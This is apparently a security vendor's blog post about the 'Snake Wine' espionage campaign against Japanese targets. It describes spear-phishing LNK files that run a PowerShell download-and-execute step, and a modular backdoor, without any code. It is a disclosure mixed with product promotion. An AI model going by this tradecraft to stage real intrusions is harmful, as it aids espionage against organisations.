While APTs targeting certain regions are nothing new, Cylance has discovered another prolonged campaign that appears to exclusively target Japanese companies and individuals that began around August 2016. The Deception Project is a Japanese-centric threat that installs malware and backdoors to conduct APT campaigns. These secretly embedded themselves in organizations for long periods of time to allow them to conduct espionage and potentially steal confidential or proprietary information.
The group has been dubbed “Snake Wine” by Cylance’s research team. Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger disinformation campaign to fake the attribution of this threat.
In an effort to expose a common problem we see happening in the industry, Cylance wanted to shed light on just how easy it is to fake attribution. The key factor we should be focused on, as an industry, is determining HOW an attacker can take down an organization, rather than focusing only on the WHO. Once we can identify how the attack happened, we can focus on what’s really important – prevention.
To date, all observed attacks by Snake Wine were the result of spear phishing attempts against the victim organizations. The latest batch used well-crafted LNK files contained within similarly named password-protected ZIP files. The LNK files when opened would execute a PowerShell command via ‘cmd.exe /c’ to download and execute an additional payload.
The additional payload includes a decoy document that executes shellcode that is nearly identical to what Cylance calls the ‘The Ham Backdoor.’ The Ham Backdoor functions primarily as a modular platform, which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control (C2) server.
If you use our endpoint protection product, CylancePROTECT, you were already protected from this attack. The Script Control feature of CylancePROTECT will prevent the initial PowerShell script from running and stop any further compromise or the download of malware.
If this feature is disabled or in alert mode, then after the payload Is downloaded and attempts to execute, the local artificial intelligence model on the endpoint will prevent the execution of any file, thus impeding the Ham Backdoor threat or any other components from executing.
The Snake Wine group has proven to be highly adaptable and continues to adopt new tactics in order to establish footholds inside of victim environments. The exclusive interest in Japanese government, education, and commerce will continue into the future as the group is just starting to build and utilize their existing current attack infrastructure. If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released information.
If you don't have CylancePROTECT, contact us to learn how our AI based solution can predict and prevent unknown and emerging threats.